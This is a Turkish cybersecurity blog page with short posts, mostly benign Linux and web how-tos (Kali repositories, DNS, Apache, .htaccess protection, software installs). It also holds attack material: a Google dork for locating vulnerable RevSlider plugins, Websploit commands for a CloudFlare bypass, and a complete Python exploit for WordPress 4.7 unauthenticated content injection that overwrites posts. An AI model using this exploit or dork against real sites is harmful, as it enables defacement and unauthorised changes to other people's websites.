erdinckaya
.org
today : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit) k4y4 rwxr-xr-x 0 Şubat 21, 2017

Filename WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit)
Permission rw-r--r--
Author k4y4
Date and Time Şubat 21, 2017
Label
Action


Google Dork;
index of /wp-content/plugins/revslider/temp/update_extract/revslider

Websploit CloudFlare Bypass k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Websploit CloudFlare Bypass
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
websploit
show modules
web/cloudflare_resolver
use web/cloudflare_resolver
show options
set target siteadi.com
run

Libre Office Kurulumu k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Libre Office Kurulumu
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
İndirme (Download) linki; http://donate.libreoffice.org/home/dl/deb-x86_64/5.2.5/tr/LibreOffice_5.2.5_Linux_x86-64_deb.tar.gz

tar -xzvf LibreOffice....
yapıp klasör olarak masaüstümüze getiriyoruz ardından
cd LibreOffice_5.2.5.1_Linux_x86-64_deb
ls yapıp içeriğini görebiliriz..
cd DEBS
root izni istiyorsa;
sudo dpkg -i *.deb
yaparak kurulumun bitmesini bekliyoruz.

Sırasıyla görseller;




Linux Websploit Kurulumu k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Linux Websploit Kurulumu
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
Kali linux vs. sistemlerde websploit kendiliğinden kurulu gelsede "Backbox, ubuntu" vs. gibi sistemlerde kurulu gelmemekte. Pekii biz bu kurulumu nasıl gerçekleştireceğiz ?
Öncelikle websploit indirmek için;
https://sourceforge.net/projects/websploit/

İndirip masaüstümüze attıktan sonra; 

Sistemimizde root değil isek sudo su ile kendimizi root yapıp
websploit dizinine gittikten sonra sh install.sh yapıp arkamıza yaslanarak saniyeler içindeki kuruluşunu izliyoruz :) Ardından cd ile ana dizine giderek websploit yazarak çalıştırıyoruz.

Linux for Skype Alpha k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Linux for Skype Alpha
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
Kali linux (64bit) vb. sistemlere Skype kurmanın zorluğunu vs. maalesef ki biliyoruz :) Skype Alpha bunu bizim için kolaylaştırıyor.
Öncelikle Skype Alpha indirme linki;
https://community.skype.com/t5/Linux/Skype-for-Linux-Alpha-and-calling-on-Chrome-amp-Chromebooks/td-p/4434299

İndirdikten sonra masaüstümüze atıp girmemiz gereken komut sırasıyla;

cd Masaüstü
dpkg -i skype..(dosyadi)

Ardından kurulumda hata bile verse aslında skype çalışır durumdadır.


WordPress 4.7 – Unauthenticated Content Injection k4y4 rwxr-xr-x 2 Şubat 15, 2017

Filename WordPress 4.7 – Unauthenticated Content Injection
Permission rw-r--r--
Author k4y4
Date and Time Şubat 15, 2017
Label
Action
 
Python (pwn.py);
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
    response = urllib2.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u
def get_posts(api_base):
    respone = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(respone.read())
    for post in posts:
        print(' - Post ID: {}, Title: {}, Url: {}'
              .format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })
    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()
    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
def print_usage():
    print('Usage: {} (optional: )'.format(__file__))
if __name__ == '__main__':
    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)
    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {}'.format(api_url))
    # if we only have a url, show the posts we have have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)
        sys.exit(0)
    # if we get here, we have what we need to update a post!
    print('* Updating post {}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()
    update_post(api_url, sys.argv[2], ''.join(new_content))
    print('* Update complete!')

Kali Linux 2.0 ve 1.1 için Güncel Depolar k4y4 rwxr-xr-x 0 Ekim 12, 2016

Filename Kali Linux 2.0 ve 1.1 için Güncel Depolar
Permission rw-r--r--
Author k4y4
Date and Time Ekim 12, 2016
Label
Action
Güncel depolarımızı eklemek için terminalimizi açıyoruz ardından aşağıdaki komutu terminalimize giriyoruz;

leafpad /etc/apt/sources.list
2.0 kullananlar için depolar;

deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free

sources.list sayfasının altına yerleştirip kaydettikten sonra yapmamız gereken işlem terminali açıp

apt-get update
 yapmaktır.

1.1.0 için depolar;

deb http://old.kali.org/kali moto main non-free contrib

Kali Linux DNS Değiştirme k4y4 rwxr-xr-x 0 Ekim 12, 2016

Filename Kali Linux DNS Değiştirme
Permission rw-r--r--
Author k4y4
Date and Time Ekim 12, 2016
Label
Action
Terminali açıp aşağıdaki komutu giriyoruz;


leafpad /etc/resolv.conf

Ardında açılan belgede karşımıza;

# Generated by NetworkManager
nameserver 195.175.39.39
nameserver 195.175.39.40

geliyor. burada yapmamız gereken sadece nameserverleri değiştirmek yani biten hali aşağıdaki gibi olmalı;

# Generated by NetworkManager
nameserver 8.8.8.8
nameserver 8.8.4.4

Ardından kaydedip kapatabilirsiniz.

Kali Linux Localhost Kurulumu k4y4 rwxr-xr-x 0 Ekim 12, 2016

Filename Kali Linux Localhost Kurulumu
Permission rw-r--r--
Author k4y4
Date and Time Ekim 12, 2016
Label
Action
Terminali açıp aşağıdaki komutu giriyoruz;


service apache2 start

Ardından klasörümüze girerek

/var/www/html


  dosya düzenleme vs. işlemlerimizi yapıyoruz

Tarayıcımızda görüntülemek için

localhost

ya da ;

127.0.0.1 adreslerine girmeniz yeterlidir.

Htaccess ile klasör şifreleme k4y4 rwxr-xr-x 0 Ağustos 29, 2016

Filename Htaccess ile klasör şifreleme
Permission rw-r--r--
Author k4y4
Date and Time Ağustos 29, 2016
Label
Action
       Web sitemizdeki herhangi bir klasörü şifrelemek mümkündür.
Bu işlem genelde güvenlik amacıyla yapılan bir işlemdir.
Genelde kullanıcılar admin panellerini daha güvenli ve ulaşılamaz hale getirmek için şifrelerler.
Web sitenize zarar vermek isteyen korsan scriptinizdeki şifreyi bilse bile klasörü şifrelediğiniz için htaccess duvarını geçemeden admin paneline ulaşamamaktadır.
Şifreleyeceğimiz dizine ” .htaccess ” , ” .htpasswd ” adında 2 dosya açmamız gerekmekte.
.htaccess için kodlarımız şu şekilde;




AuthType Basic
AuthName "Buraya herhangi bir açıklama yazıyoruz"
AuthUserFile home/spycod3/public_html/dosya/.htpasswd
require valid-user

Bu bölümde AuthName yazan yere açıklama yazıyoruz. AuthUserFile yazan yere ise şifremek istediğimiz klasörün konumunu yazıyoruz. Bu işlemleri tamamladıktan sonra ” .htpasswd ” dosyası oluşturuyoruz ve bu dosyanın içine gireceğimiz kullanıcı adı ve şifeyi giriyoruz. Kullanıcı adı ve şifre oluşturmak için buraya tıklayarak siteye gidiyoruz.
Name bölümüne kullanıcı adımızı password bölümüne şifremizi ve password again bölümüne tekrar şifremizi girdikten sonra encrypt diyoruz bize örneğin ” admin:42cuaX5sK6S4I ” böyle bir kullanıcı adı ve şifre oluşturuyor.
Bu kullanıcı adı ve şifreyi olduğu gibi ” .htpasswd ” dosyamızın içine kaydediyoruz ardından işlemimizi bitiriyoruz.
Bu şekilde klasörleriniz şifreleyebilirsiniz
 

Erdinckaya © 2017 Erdinç Kaya | Siber Güvenlik Blog
Template design by k4y4